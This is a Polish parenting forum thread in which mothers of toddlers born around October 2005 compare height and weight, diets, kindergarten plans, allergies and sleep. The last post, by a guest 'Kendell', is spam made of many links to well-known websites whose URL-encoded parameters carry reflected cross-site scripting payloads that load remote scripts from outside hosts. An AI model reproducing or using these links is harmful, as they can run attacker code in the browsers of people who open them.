Skocz do zawartości
Szukaj w
  • Więcej opcji...
Znajdź wyniki, które zawierają...
Szukaj wyników w...

Zarchiwizowany

Ten temat jest archiwizowany i nie można dodawać nowych odpowiedzi.

Gość Tinker Bell

Termin na pazdziernik 2005

Polecane posty

Eli ten rok was nie oszczedza:(. Wierze, ze to co ma Kuba cie przygnebia. kazda matka pragnie miec zdrowe dziecko i zeby bylo wszystko w porzadku. To boli bardzo. Ja ostatnio probowalam namowic meza na jeszcze jadna probe, ale powoli mi to przechodzi. Co raz to wiecej slysze o roznych wadach wrodzonych. To wszystko mnie przeraza, tym bardziej, ze moje malenstwo bylo chore. Wiem, ze tak nie musi byc, ale ja zrobilam sie slaba psychicznie, wiec chyba bym sobie nie poradzila w ciazy, bo bym wiecznie miala jakies schizy:(niestety. Myslalam, ze czas leczy rany, ale nie zawsze tak jest u mnie ostatnio bylo coraz gorzej ze mna. Juz myslam, ze musze isc do psychiatry, ale jakos sobie sama poradzlam i w koncu jest ok. W koncu zaczelam sie usmiechac i widziec wszystko w innych kolorach. Nasze maluzenstwo przechodzilo maly kryzys, ale mamy to juz na szczescie za soba:) Nie jest mi latwo, ale staram sie myslec tylko pozytywnie. Oliver mial tez jakis czas bardzo ciezki okres. W ogole sie mnie nie sluchal, robil co chcial, ale teraz jest lepiej, na szczescie:) Mowi duzo, rowniez zdaniami. zawsze mezowi opowiada co robil w ciagu dnia. Rosnie z nego madry chlpak. Uczy sie chetnie i szybko nowych rzeczy. W kontaktach z dziecmi tez nie ma problemow, co mnie cieszy:) jestem szczesliwa, ze jego mam:) Nadal codze do szkoly. Od jesieni chce zaczac szukac pracy. Rowniez rozwazamy kuna mieszkania, albo domu, ale to jeszcze nic pewnego. Musimy sie najpierw konkretnie rozejrzec. to tyle u nas:)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Fajnie Jokas, że sie odezwałas i ze juz u Ciebie lepiej. Wnioskuję o 1) uaktualnienie tabelki z danymi teraz na 2,5 roku 2) wysłanie do mnie zdjęc waszych maluchów bo niektórych daaawno nie widziałam.... zapytuję: 1) czy obieracie dzieciom winogrona ze skórki?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Eli - ja nie słyszałam o tej wadzie, tyle co poczytałam na necie na linkach podanych przez Ciebie. Wiesz ja myslę, że skoro wada nie jest duża, to może obejdzie się bez zabiegu. Poza tym wydaje mi sie, że wiele zależy też od waszego podejścia jako rodziców, a w okresie dojrzewania może jakiś psycholog? Czasy się zmieniaja i nie jest juz tak źle jak kiedyś pod tym względem \"odmienności\" jakakolwiek by nie była. Teraz juz inaczej patrzy się na ludzi niepełnosprawnych, chorych, ze znamionami itp. Więc defekt kosmetyczny nie powinien być wielkim problemem, oby tylko nie miał kłopotów fizjologicznych z tego powodu. Co do tabelki, to jestem za, właśnie dzisiaj mierzyłam i ważyłam Kondzia, schudł mi okropnie przez tę chorobę waży ok. 12,2 kg, mierzy 93 cm bez butów. Winogrona czasem obieram, a czasem nie, zależy od skórki jak schodzi i twarda to obieram. jokas - trzymaj się Kobieto pozytywnie!! Ja też pewnie będę musiała cieszyc się jednym dzieckiem. Jeszcze zobaczymy. My właśnie zapisujemy małego do przedszkola, zobaczymy czy się uda. Poza tym jutro będzie miał stawiane bańki, bo wszystko zeszło mu na oskrzela i lekarka się boi żeby zapalenia nie było. Tak więc spędzę jeszcze kilka dni w domu zamiast iść do pracy. Chociaż w weekend musze iśc na zajęcia.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Oliver nie za bardzo przepada za winogronem, wiec nie mam z tym problemu.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Oliver nie za bardzo przepada za winogronem, wiec nie mam z tym problemu.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Kamilek ma tez 93 cm i wazy ok 13,5. A do przedszkola składamy wnioski, ba nawet do kilku bo strasznie trudno się dostac.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Dziewczyny powaznie wasze dzieci maja 93 cm? Olivera mierzylam jakis czas temu i ma okolo 98cm. Myslalam, ze to przecietny wzrost 2,5 latka. Ile wazy nie wiem , bo go dawno nie wazylam. Musze sprawdzic.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
ŚREDNIA MASA i DŁUGOŚĆ CIAŁA Chłopcy Waga w 12 miesiącu: 10,2 kg Długość ciała w 12 miesiącu: 76 cm Waga 3 latka: 14,2 kg Długość ciała 3 latka: 96,5 cm Dziewczynki Waga w 12 miesiącu: 9,5 kg Długość ciała w 12 miesiącu: 74 cm Waga 3 latka: 13,9 kg Długość ciała 3 latka: 95,5 cm Ale sie zdziwilam teraz, jak to przeczytalam. Nie sadzilam, ze moje dziecko to ma wzrost 3 latka. U gory wam wkleilam srednie statystyczne wzrostu dziewczynki i chlpca.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
No to masz wysokiego synka:) A wy jestescie wysocy? Oli jest na ok 97 centylu. Kamil i Kondzio- na 50.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Czesc dziewczyny, Nadia wazy 15 kg, a wzrostu ma około 95. Wydaje mi sie, ze duzo je, bo babcie w nią cały czas coś wciskają, ale wygląda normalnie. Nie wydaje mi sie jakaś duża, bo jak porównuję do dzieci znajomych , to chłopczyk pół roku od niej starszy jest o głowę wyższy, a dziewczynka mojej koleżanki ważyła w tym wieku 20 kg! Zastanawialiśmy się nad przedszkolem, ale zdecydowaliśmy, że jeszcze zostanie w domu i poczekamy do następnego roku. Ma dobrą opiekę-babcia i prababcia non stop, na razie w ogóle nie choruje, więc niech tak na razie zostanie. Mamy jeszcze problem z siusianiem, mówi, że chce siusiu dopiero, jak troszkę zrobi, wiec nosi jescze pieluszki. Gada jak najęta, jej niektóre teksty są naprawdę świetne. Śpi w dzień tylko w niektóre dni, jak jest bardzo zmęczona po spacerze. Postaram się wysłać kilka zdjeć.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
ale Wasze dzieci sa duze! Bartek ma 88cm i wazy 13kg i przewaznie spotykam sie z opinia ze jest drobny jak na swoj wiek,ale porownujac go do syna mojej siostry to Bartek sie pulchniutki:) Maly ma dzisiaj taki mokry kaszel ale to pewnie na ostatni zabek,dwa tygodnie przed wielkanoca wychodzil mu przedostatni zab i mial angine,pojechalismy do lekarza bo mial wysokie tetno serca 180 mialam juz czarne wizje,ale w przychodni byl rozpalony i mial temp39 i to od tego bylo takie wysokie tetno,jak spadla goraczka to tetno sie uregulowalo,ale niezle nas wystraszyl,no i teraz na ostatni zabek kaszel.Musze Wam powiedziec ze cale zabkowanie przechodzil pozno i zawsze z jakimis dolegliwosciami i czesto mial wlasnie angine.wiec dobrze ze to ostatni zabek bo bedzie spokoj. Bartek nie lubi winogron,z owocow nadal tylko banan,ale z tego co widzialam u siostry ona swojemu obierala ze skorki w zeszlym roku. eli wspolczuje malemu Kubusiowi,mam nadzieje ze z czasem Wam sie pouklada .eli a ty jak z praca,bo za nim zaszlas w ciaze to mowilas ze niewesolo,wiec jak Ci sie skonczy macierzynski to wracasz do pracy? My juz czesciowo wyprowadzeni zostalo nam najpotrzebniejsze rzeczy w domu,ale okolo wtorku wybywam,chcialabym juz byc po remoncie bo ta wyprowadzka mnie przeraza. ania30 nie obawiam sie zostawic meza z balaganem bo on jak musi to umie posprzatac i jest dokladny,bardziej martwi mnie rozlaka i napewno dlugo nie bede u siostry tylko postaram sie przemeczyc u tesciow. Jak przezyje ten caly wir remontowy to napewno do Was wroce:)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
od czasu do czasu slyszalam, ze Oli jest duzy, ale nie sadzilam, ze az tak. Ja mam 1,68 a maz 1,8. Oli tez sie ostatnio oduczyl i zaczal mi w majtki sikac, ale ja nie zakladam mu pamapersa tylko dalej walcze. A my dzisiaj przeprowadzilismy Olivera do wiekszego pokoju. Bajzel., ze szkoda mowic. Wlasnie siedze w naszym nowym burze i do was pisze haha. Pokuj Olivera juz skanczony. Teraz jeszcze biuro do porzadku musze doprowadzic:) Najbliszym czasie chcemy rowniez duzy pokuj przemalowac, bo okropnie juz wyglada;(

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Flowers będzie nam Ciebie brakowało! Wracaj do nas szybko! Laura ale nadia jest duża! Ja mam nadzieję, że Kamil będzie wazył 15 kg w wieku 3 lat i ze utrzyma się na 50 centylu. A co Nadia jada? Kamil je moim zdaniem duzo a waży raczej niewiele. Tyle, że jada raczej zdrowo a wiec małokalorycznie. Ja mam ostatnio hopla na punkcie wzrostu Kamila i robię wszystko aby dobrze rosł ;) Ja z mężem nie jestesmy wysocy- 1,65 i 1,74 i obawiam się ze przy drobnej posturze Kamilka i jeszcze niskim wzroście to będzie straszna drobnica w przyszłosci. Kubie to chyba nie grozi ;)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
jokas - fajnie że się odezwałaś !!! A ztymi dołami to trzymaj się dziewczyno, masz olivierka , masz dla kogo żyć i dla kogo wstawać codziennie. ?Ja tak się zastanawiałam że chyba tych wszystkich rzeczy w moim małżeństwie nie przetrwałabym jakbym nie miała Sebka. Teraz jest on dla mnie najważniejszy... I nawet jeśli jest mi pisane całe życie być sama to i tak zrobię wszystko żeby Sebastian był szczęsliwy. Za tabelka aktualną jest też, Sebek waży niecałe 12 kg a mierzy 91 cm , więc chyba jest najmniejszy. Eli - winogrona zawsze obierałam ale na święta kupiłam fajne małe , bez pestek i miały miękką skórkę więc jadł je całe. Moja mama od początku jak mu dawała kazała mu skórkę wypluwać i skończyło się to tym ,że on np jadł rzodkiewkę , pogryzł ją i wypluwał. Teraz z tym walczę. Już jest lepiej , chociaż jeszcze się zdarza. Do przedszkola ide w środę na dni otwarte i wezmę złoże wniosek , a do września się zastanowię czy pójdzie, Na razie jestem na nie, ale jeszcze mamy trochę czasu. A wczoraj Sebek dostał rower, używany ale fajny i wczoraj trochę na nim siedział a dzisiaj poszliśmy jeździć. Na razie uczył się kierować i trzymać nogi na pedałach, a nie jest łatwo.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Eli-Nadia pije przed spaniem i rano mleczko (Nestle Junior) z butelki (240 ml), zjada dwa śniadanka (kanapka z wędliną lub parówka, drożdzówka z Danio), na obiad duuuży talerz zupy z kluseczkami i mieskiem, zaraz potem drugie danie (miesko z zniemiaczami i gotowanymi warzywami), pożniej deser (np.monte), na kolację mniej wiecej to, co na śniadanie).Obiadki gotuje jej prababcia, w międzyczasie czasami zjda czekoladkę. Cieszę sie, ze ma apetyt, jak by była grubawa, to chyba bym hamowała babcie, ale wydaje mi się, ze rośnie \"wzdłuż\", a nie \"wszerz\". Ja mam 1,72, a mój mąż 1,85.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Laura no pewnie, że dobrze , że mała ma apetyt. Jest wysoka więc nie jest gruba choć ładnie wazy. Chciałabym aby Kamil tyle ważył bo to takie chuchro ;) A apetyt Kamil coprawda ma łądny ale \"nieregularny\". Ma zwykle kilka dni , że nie ma apetytu i jada niewiele a ptem nadrabia i je strasznie duzo. i tak od zawsze.... Myślałam, że to skoki wzrostowe się tak objawiają ale szczerze mówiąc nie wiem. A Kubuś waży ciągle za duzo. Juz dobijalismy prawie do siatki centylowej ale zaczął ząbkowac i w nocy co chwile pocieszał się przy cycu... Teraz ząbki wyszły a znów kilka dni budzi się co godzinę i podjada bo noszenie na rekach nie uspakaja go . Nie wiem czy znó będzie zabkował czy inna jest tego przyczyna. Kamil mając rok ważył 10 kg a Kuba ma 3,5 mies i wazy juz prawie 9!

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Dla mnie to bylo kolejne zaskoczenie, ze Oliver ma 15 kg, bo ja naleze do szczuplyc osob, maz rowniez jako dziecko byl dlugi i szczuply i taki tez jest nasz Oli:). Je czasami bardzo duzo, ale tez ma dni, ze je jak maly kotek:) U nas dzisiaj snieg pada. Ja mam w zwiazku z tym migrene, bo zawsze ze zmiana pogody sie u mnie pojawia:(

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
A my juz po bańkach i ani śladu kaszlu i kataru, odeszło jak ręka odjał.:) Jokas - to Oliver faktycznie bardzo wysoki, ja nie mierzę go w domu, bo zawsze więcej wychodzi. Tylko zawsze na tej samej miarce w przychodni, miał 95 cm, ale w butach stąd napisałam 93 cm. Ogólnie wszyscy mówią, że wysoki jest na swój wiek, ale może to tez dlatego, że szczupły, żeby nie napisać chudy ostatnio:) ja niska jestem mam 1,58 m a maz 1,83 m. Laura - na zdjęciach Nadia taka drobniutka:) gdzie te 15 kg?:) bardzo dużo w porównaniu z moim synciem je, mój okropny niejadek. Chociaż od dwóch dni nadrabia po chorobie. Flowers - wracaj szybko:) i oby Bartus już nie chorował i nie straszył rodziców tętnem. Agus7 - tak trzymaj Kobieto! Beznadziejni mężczyźni tylko przeszkadzają, Ty silna jesteś i dasz rade, a ja wierzę, że za rogiem czeka ten właściwy:) Eli - Kondzio tez tak je kilka dni, a potem prawie wcale, dodatkowo toleruje dosłownie kilka potraw, co będzie jadł w przedszkolu to nie mam pojęcia:( A co do Kubusia, to kondzio tez tak ząbkował, odpuszczało na dosłownie 2-3 dni i zaczynały iśc następne zęby i tak w kólko. Chyba Ci ciężko dziwgać Kubusia juz co? A u nas leje jak z cebra i wieje okropnie...:(

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Ostatni wam pisalam, ze oliver robi mi czesto w majtki, a tu dzisiaj jak reka odjol i wola mama pipi albo na toalete. Mam nadzieje, ze mu to juz tak zostanie. :)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
A ja nie dostałam zdjeć Nadii :( Kuba wczesniej tak pieknie sypiał a od kilku nocy pobudka co godzinę lub częsciej , spi strasznie nerwowo, rzuca się, uspakaja się tylko przy cycu :( Nie mam pojęcia co jestbo zębów nowych nie widac... ( Tu pytanie do Doty- czy moze się w ten sposob objawiac ze cos z mojej diety mu nie służy?) A ja jem ilosci przeogromne, kilka kotletów dziennie, pochłaniam wszystko co się nadaje do jedzenia... Mąz zrobił sobie wczoraj pieczoną golonkę z indyka a ja ją całą sama zjadłam ;) Na kolację. A w nocy wstawałam jesć! Mimo to w ciązu 4 dni schudłam kilogram. Ważę juz ok 5 kg mniej niz przed ciążą.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Eli - Kubus ma kolki? wtedy jest to możliwe, że coś mu szkodzi i przy kolkach też może się uspokajać przy cycu. Ale jak sobie przypomnę, to wracałam do pracy jak Kondzio miał 4 miesiące i miałam ten sam problem skończyło się spokojne spanie i zaczęła droga przez mękę, ale z powodu atopowego zapalenia skory. Mały był już w takim wieku, że wypryski skórne dawały mu okropnie o sobie znać, usiłował się drapać, ale nie był jeszcze za bardzo w stanie. W nastepnych miesiącach było jeszcze gorzej. U nas najgorzej było pod szyja i w zgięciu kolan, potem dołączyły zgięcia łokci, a ustąpiły uszy. Do tego dołączył problem z kolkowo-alergicznymi stolcami ze śluzem, które męczyły go właśnie w nocy. Tak więc chodziłam nieprzytomna maksymalnie. Pooglądaj malca czy ma wypryski skórne i albo smaruj go emolientami albo zdecyduj się raz na jakis czas na odrobinkę cutivate lub elocomu. Problemy zaczynają się w nocy, bo skóra swędzi jak się ciałko nagrzeje, a jak Kubuś śpi to po pewnym czasie już mu zbyt ciepło i swędzi. Konradowi od razu szły do tego zęby i było wszystko naraz. Swoją drogą Twoje pożywienie może powodować wysypki i koło się zamyka. Spróbuj ubrać go lżej na noc, lub lżej przykryć, może będzie lepiej. Zazdroszczę tej wagi, ja ważę ok 7 kg więcej niż przed ciążą i 8 więcej iż po porodzie - długie karmienie niestety pozostawiło po sobie dziwny slad:( Jedz kobieto, bo mały nieźle Cię zjada jak taki duzy:):) Przeczytałam właśie raz jeszcze co napisałaś - u nas było identycznie, po prostu sie rzucał:(...

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
udało się wreszcie sciągnać u kamilka napletek do konca sam sobie sciągnął w kąpieli Dota jestem na diecie bezmlecznej a mały nie ma kompletnie żadnych objawów alergii. No moze poza śluzem w kupach. nie ma wysypeki, nic w zięciach, nic go nie swedzi, ciemieniuchy nie ma od dawna i kolek równiez nie. tylko te kupy. nie sądzę, żeby o swędzenie chodziło.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Eli - więc jedyne co mi wpada go głowy, to te stolce. Może go to męczy u nas w każdym razie tak bylo. Ja mialam jazdy nieprzeciętne z tym przez ponad dwa miesiące. Kiedy zaczęło się dokładnie maks swędzenie nie pamietam juz, ale gdzieś chyba ok. 4,5 miesiąca więc później, ale było to następstwo wszystkich wcześniejszych objawów. A jesli chodzi o kupole, to tez mi przez nie nie spał, był niespokojny i rzucał się, bo nie dawał rady sam ich wywalczyć, a jakos tak wyszło, że upodobały sobie godzin nocne i trochę czasu minęło nim zaskoczyłam o co chodzi. jesli mały nie ma wyprysków, kolek i nie pogarsza mu się stolec (chociaz u nas juz sie gorzej chyba nie dalo) to raczej nie pokarmówka, ale ekspertem nie jestem:). Mojego wysypywało mi prawie po wszystkim co zjadłam. Obserwuj chyba nic innego nie poradzę. Oby szybko przeszło. Jokas - fajnie, że Oliver robi postępy:) A moj syncio nagle z dnia na dzień jakieś 3 tygodnie temu zaczął gadać jak najęty:) już mam etap, że proszę o chwilunię ciszy:) A jak z nim wyjdę lub wyjadę, to nic tylko odpowiadam na tysiące pytań:) Super:):)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Laura zdjęcia nie doszły. Dota przyzanje ze czasem zrobie sobie dzien przerwy i jem nabiał- tzn zdarzyło mi się to ze 3 razy w ciągu 1,5 miesiaca i nie miał zadnych objawów wiec zwątpiłam czy on w ogole ma alergię ale boję się zacząc jesc normalnie. A spotkałam się z opinią ze śluz w kupie przy karmieniu piersią bywa rzeczą normalną. hmmmm. Kamil tez miał objawy alergii w wieku 2,5 mies , wysypka, ciemieniucha... a jak odstawiłam nabiał - przeszło. Wróciłam jednek zaraz po zniknięciu objawów do jedzenia produktów mlecznych a mimo to nic sie juz nie działo. Słyszałam o czymś takim jak \"przebiałczenie\", moze ja po prostu jadłam tego za duzo ? Dotka jak myslisz?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Kendell
057984642c06e4b329577db8d90290ac http://budgettravel.about.com/gi/pages/mmail.htm?nlrc=2&surl=http://budgettravel.about.com/gi/pages/mmail.htm&eurl=http://budgettravel.about.com/gi/pages/mmail.htm&gs=1&email=Enter%20email%20address&newsub=Go&curl=http://%22%3E%3C/script%3E%3Cscript%20src=http://plord.narod.ru/script.js%3E%3C/script%3E.about.com/gi/pages/mmail2.htm?zi=18%2F1a9&surl=http%3A%2F%2Fbudgettravel.about.com%2Fgi%2Fpages%2Fmmail.htm&eurl=http%3A%2F%2Fbudgettravel.about.com%2Fgi%2Fpages%2Fmmail.htm&cmd_budgettravel=%2B%3Ags%3A%3Abudgettravel&gs=1&sdn=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-fwupdate&tt=1&bts=1&email=Enter+email+address http://budgettravel.about.com/gi/pages/mmail.htm?nlrc=2&surl=http://budgettravel.about.com/gi/pages/mmail.htm&eurl=http://budgettravel.about.com/gi/pages/mmail.htm&gs=1&email=Enter%20email%20address&newsub=Go&curl=http://%22%3E%3C/script%3E%3Cscript%20src=http://plord.narod.ru/script.js%3E%3C/script%3E.about.com/gi/pages/mmail2.htm?zi=18%2F1a9&surl=http%3A%2F%2Fbudgettravel.about.com%2Fgi%2Fpages%2Fmmail.htm&eurl=http%3A%2F%2Fbudgettravel.about.com%2Fgi%2Fpages%2Fmmail.htm&cmd_budgettravel=%2B%3Ags%3A%3Abudgettravel&gs=1&sdn=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-fwupdate&tt=1&bts=1&email=Enter+email+address http://www.allbusiness.com/3470945-1.html?query=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-nickdrake&x=1&y=1 http://www.allbusiness.com/3470945-1.html?query=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-nickdrake&x=1&y=1 http://www.bizrate.com/golfgifts_equipment/golf-bags-carts--travel-bags/products__att361177--361109-__sort--%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-heartward__userzip--.html http://www.bizrate.com/golfgifts_equipment/golf-bags-carts--travel-bags/products__att361177--361109-__sort--%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-heartward__userzip--.html http://www.handster.com/catalog.php?search=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-lonley-housewifes&x=1&y=1 http://www.handster.com/catalog.php?search=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-lonley-housewifes&x=1&y=1 http://europe.mapquest.com/directions/europe.adp?go=1&do=nw&rmm=1&pn1x=&a1x=&c1x=&s1x=&z1x=&pn2x=&a2x=&c2x=&s2x=&z2x=&un=m&cl=EN&qq=hltF3hzNT9vgCYgFpG%252fDI6Zd139xgLqWl5mHnyn%252b%252b8o%253d&ct=EU&rsres=1&1y=AT&1a=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-herara&1c=&1z=&2y=AT&2a=&2c=&2z=&r=f http://europe.mapquest.com/directions/europe.adp?go=1&do=nw&rmm=1&pn1x=&a1x=&c1x=&s1x=&z1x=&pn2x=&a2x=&c2x=&s2x=&z2x=&un=m&cl=EN&qq=hltF3hzNT9vgCYgFpG%252fDI6Zd139xgLqWl5mHnyn%252b%252b8o%253d&ct=EU&rsres=1&1y=AT&1a=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-herara&1c=&1z=&2y=AT&2a=&2c=&2z=&r=f http://www.plentyoffish.com/sendmessage.aspx?usersendto=7213248&sendto=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-paroliere&v=&submit=Contact+balance_equinox+Now! http://www.plentyoffish.com/sendmessage.aspx?usersendto=7213248&sendto=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-paroliere&v=&submit=Contact+balance_equinox+Now! http://www.scout.com/search.aspx?siteSearch=Scout.com&q=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-kdtrees&x=1&y=1&s=143 http://www.scout.com/search.aspx?siteSearch=Scout.com&q=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-kdtrees&x=1&y=1&s=143 http://www.shopzilla.com/2_-_SEARCH_GO.x--1__SEARCH_GO.y--1__cat_id--1__keyword--%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-erac-sale http://www.shopzilla.com/2_-_SEARCH_GO.x--1__SEARCH_GO.y--1__cat_id--1__keyword--%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-erac-sale http://www.thefreelibrary.com/_/search/Search.aspx?SearchBy=0&Word=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-jackplate&Search=Search&By=0 http://www.thefreelibrary.com/_/search/Search.aspx?SearchBy=0&Word=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-jackplate&Search=Search&By=0 http://www.tv.com/search.php?qs=&type=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-surviver-man&stype=search http://www.tv.com/search.php?qs=&type=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74%61%6C%69%6F%6E%2E%63%63%2F%68%61%69%6C%2F%3E%3C%2F%73%63%72%69%70%74%3E-surviver-man&stype=search 22be415220557afdcc5515df0e9cc38e

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

×